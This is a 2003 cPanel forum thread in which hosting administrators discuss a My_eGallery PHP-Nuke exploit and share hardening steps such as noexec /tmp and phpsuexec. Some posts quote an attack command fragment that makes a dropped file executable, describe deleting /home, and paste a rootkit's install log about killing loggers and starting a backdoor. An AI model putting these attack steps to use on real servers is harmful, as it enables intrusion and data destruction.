The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

ATTENTION: My_eGallery exploit could give root access

Discussion in 'General Discussion' started by geekhosting, Dec 15, 2003.

  1. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    After snooping around through my apache logs, i stumbled upon what i found out to be a recent exploit of the My_eGallery module for PHP-Nuke and POST-Nuke.

    According to BugTraq this exploit only allows users to inject .txt, .jpg, and .gif files into a website however this is not true.

    After playing with the strings i was able to decompress .tar.gz files, compile and run programs on my test servers, and in several instantces download/run trojans and rootkits :rolleyes:

    I reccomend that you take the follwing actions.

    MAKE SURE /tmp is mounted with noexec (saved my ass)
    Notify your clients that use this and let them know that there is a fix out

    or disable it all together by chmod 000 folder :) and let them come to you.

    Due to the concern that this exploit poses to me i will not release the strings on this forums but if you would like a demonstration i will be more than happy to put something in your /tmp folder :D and of course it would not be malicious
     
  2. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    using phpsuexec and open_basedir doesn't solve this probs ??
     
  3. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    Not that i have seen. the strings that are run will use the user nobody to run an execute. Is there any folders where nobody isnt allowed?
     
  4. solan

    solan Active Member

    Joined:
    Apr 11, 2003
    Messages:
    37
    Likes Received:
    0
    Trophy Points:
    6
    I know "geekhosting" personaly and he gave me a demo, and while the client was removeing the My_eGallery he(geekhosting) was still able to get the file in! This is no LIE

    -rwsrwsrwt 1 nobody nobody 388098 Jul 5 2000 PHP-Nuke-1.0.tar.gz*

    he just did a simple test with something that couldn't be bad! so if you need him to do this for you to prove this is a very very big exploit then so be it, but i would personly check all clients

    root@host1 [/]# find ./ -name My_eGallery

    this will locate all the folders for you really quickly and you'll be able to take a further step in running this

    root@host1 [/]# chmod 000 /home*/*/public_html/modules/My_eGallery

    Hope this simple fix helps for the time being, this will totaly disable there ability to use this module!
     
  5. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    When you enable phpsuexec, the scripts will run as the user only and not as nobody user. Try phpsuexec. Once the script runs only as the user, he has access to only his homedirectory.

    Its should be worth a try. If i m wrong please do let me know.
     
  6. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    got a client using My_eGallery, i would love to test this.
     
  7. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    if you can try with phpsuexec enabled with open_basedir. my guess is it sud help.
     
  8. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    well i just tried it on my production server :( which has openbase_dir and phpsuexc and it went right past it.... so although that was a logical answer still did nothing.
     
  9. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    geekhosting, good catch and thanks for sharing. Although you say that phpsuexec enabled with open_basedir did nothing, did you have /tmp noexe setup like you mentioned in your first post?

    I also wonder how well this exploit would work, if someone is using safe_mode "ON"?

    Also, you mention there is a "fix" for it -- any idea where this is available from?
     
  10. rvskin

    rvskin Well-Known Member
    PartnerNOC

    Joined:
    Feb 19, 2003
    Messages:
    400
    Likes Received:
    1
    Trophy Points:
    18
  11. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
  12. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    Except for copying / uploading files, where you able to execute any commands / code which could endanger the system in any manner ?

    Still confused, when the php script runs as the user, and the user is restricted to only certain directories, how can he get access to outside dirs / files.
     
  13. rvskin

    rvskin Well-Known Member
    PartnerNOC

    Joined:
    Feb 19, 2003
    Messages:
    400
    Likes Received:
    1
    Trophy Points:
    18
    It can run some command at least 'wget', 'cd' , and etc. and like 'geekhosting' said, he can upload rootkit, trojans, and etc. And experieced hacker could easily manage to run it.
     
  14. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    ok,
    As a matter of fact i was physically able to rm -rf /home/* As stated earlier, this goes beyond the advisory which has played it down. The exploit is actually 2 parts.

    One where there is a php script written to do damage (different than the advisory i might add) and the trailing end of the URL which performs system commands. Here is the last bit of the code which i found attempting to be used on my system

    chmod%207777%20tt.txt;./tt.txt
     
  15. admin0

    admin0 Active Member

    Joined:
    Aug 11, 2002
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Basic steps that would help are:

    1. update the system software
    2. chmod 700 <compilers>
    3. Mount /tmp and /var/tmp with nosuexec
    4. chmod 700 wget, lynx and other that can download files
    5. install mod_security, with detail access list.


    Hope this helps


    :p
     
  16. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Is it safe to symlink /var/tmp to tmp ?

    Or is /var/tmp used to execute programs like buildapache, rpm's or other software?

    My /tmp is 1 GB.

    If symlinking causes no problems then I would prefer to do it this wasy instead of creating a seperate partition for /var/tmp as well.
     
  17. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
  18. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    fogot to add this
    reimaged my test box with tigher security and managed to upload/install fuckit rootkit with tighter restrictions.



     ########################################## ######### FucKit RK 0.4 by Cyrax ######### ##########################################  Preparing to install ....  done!  Phase #1: Unpacking & installing filez...  done!  Phase #2: Killing system loggers.  Usage: /etc/init.d/syslog {start|stop|status|restart|condrestart}  Phase #3: Starting backdoor...  done! 
    Warning: open_basedir restriction in effect. File is in wrong directory in /home/httpd/vhosts/ltest.com/httpdocs/modules/My_eGallery/public/displayCategory.php on line 3
     
    #18 geekhosting, Dec 16, 2003
    Last edited: Dec 16, 2003
  19. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    It will at least stop the script kiddies then, which would account for 99% of these types of attacks I would assume :)
     
  20. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    this might be true. I forgot to add that i did this on a plesk box which i have posted and a cpanel box.

    Also there seems to be quite a discussion about the recent exploit at RS (ev1 servers). seems as if many of there servers are getting hacked
     

Share This Page